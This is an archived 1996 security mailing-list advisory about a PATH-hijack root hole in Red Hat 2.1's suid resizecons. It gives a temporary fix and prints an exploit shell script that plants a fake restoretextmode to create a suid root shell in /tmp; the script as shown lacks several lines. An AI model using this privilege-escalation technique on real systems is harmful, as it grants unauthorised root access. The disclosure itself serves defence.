mailing list archives
resizecons Red Hat 2.1 security hole
From: davem+ () andrew cmu edu (David J Meltzer)
Date: Fri, 2 Feb 1996 22:31:23 -0500
There is a security hole in Red Hat 2.1, which installs the program
/usr/bin/resizecons suid root. The resizecons program allows a user
to change the videmode of the console. During this process, it runs
the program restoretextmode without an absolute pathname, assuming the
correct version will be found in the path, while running with root
privileges. It then executes setfont in the same manner. By setting
the path to find a rogue restoretextmode, a user can execute an arbitrary
program as root.
As a more amusing aside, the file /tmp/selection.pid is read and the
pid contained within is sent a SIGWINCH, allowing a user on the system
to force a redraw of the screen to an arbitrary process (that handles
SIGWINCH calls) on the machine.
If /usr/bin/resizecons needs to be run by users other than root at the
console, provisions need to be made in the code to execute the outside
utilities with absolute pathnames, and to check access rights on files
Affected Operating Systems: Red Hat 2.1 linux distribution
Requirements: account on system
Temporary Patch: chmod -s /usr/bin/resizecons
Security Compromise: root
Author: Dave M. (davem () cmu edu)
Synopsis: resizecons runs restoretextmode without an
absolute pathname while executing as root,
allowing a user to substitute the real
program with arbitrary commands.
# exploits a security hole in /usr/bin/resizecons
# to create a suid root shell in /tmp/wozz on a
# linux Red Hat 2.1 system.
# by Dave M. (davem () cmu edu)
echo ================ wozzeck.sh - gain root on Linux Red Hat 2.1 system
echo ================ Checking system vulnerability
if test -u /usr/bin/resizecons
echo ++++++++++++++++ System appears vulnerable.
cat << _EOF_ > /tmp/313x37
This exploit is dedicated to
Wozz. Use it with care.
cat << _EOF_ > /tmp/restoretextmode
/bin/cp /bin/sh /tmp/wozz
/bin/chmod 4777 /tmp/wozz
/bin/chmod +x /tmp/restoretextmode
echo ================ Executing resizecons
if test -u /tmp/wozz
echo ++++++++++++++++ Exploit successful, suid shell located in /tmp/wozz
echo ---------------- Exploit failed
echo ---------------- This machine does not appear to be vulnerable.
|davem () cmu edu|
|School of Computer Science|
|Carnegie Mellon University|
abuse Red Hat 2.1 security hole David J Meltzer (Feb 03)
resizecons Red Hat 2.1 security hole David J Meltzer (Feb 03)
Re: bind() Security Problems Casper Dik (Feb 02)
Re: bind() Security Problems Alan Cox (Feb 01)
- Re: bind() Security Problems, (continued)